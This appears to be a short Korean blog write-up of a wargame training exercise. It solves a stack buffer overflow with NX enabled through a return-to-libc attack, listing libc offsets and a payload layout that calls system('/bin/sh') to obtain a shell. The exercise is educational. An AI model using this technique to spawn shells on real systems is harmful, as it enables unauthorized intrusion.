c1 - exercise6

두비니

·

2020. 10. 18. 01:47

 

 

 

exercise5랑 거의 똑같은데 이번에는 직접 쉘을 따야 하는 것 같네요.

buf는 0x48인데 0x60씩 넉넉하게 받아서 편하게 페이로드 짜면 될 것 같군요

 

 

NX도 걸려있는지라 RTL쓰겠습니다

 

system함수 검색 안되게 해놨네요.. libc database 사용하겠습니다.

 

 

offset___libc_start_main_ret = 0x18550
offset_system = 0x3a950
offset_str_bin_sh = 0x15910b

 

페이로드

 

"A"*0x4c + &system + "A"*0x4 + &"/bin/sh\x00"

 

 

 

 

 

 

etc

 

1.

 

직접 구한 base와의 offset과는 달라서 왜 저런거지?라고 생각했는데 모든 라이브러리 및 버젼에 따라서 달라져서 그렇다고함. wow

 

 

2. 

libc.blukat.me/

 

libc database search

Query show all libs / start over

libc.blukat.me

libc database 사이트도 있었음ㅋㅋㅋㅋㅋ 현대기술에 힘에 취해벌입니다,, 

'War Games > training_prob' 카테고리의 다른 글

betting  (0) 2020.12.02
c1 - exercise7  (0) 2020.11.29
c1 - exercise5  (0) 2020.10.16
c1 - exercise4  (0) 2020.10.15
c1 - exercise3  (0) 2020.10.14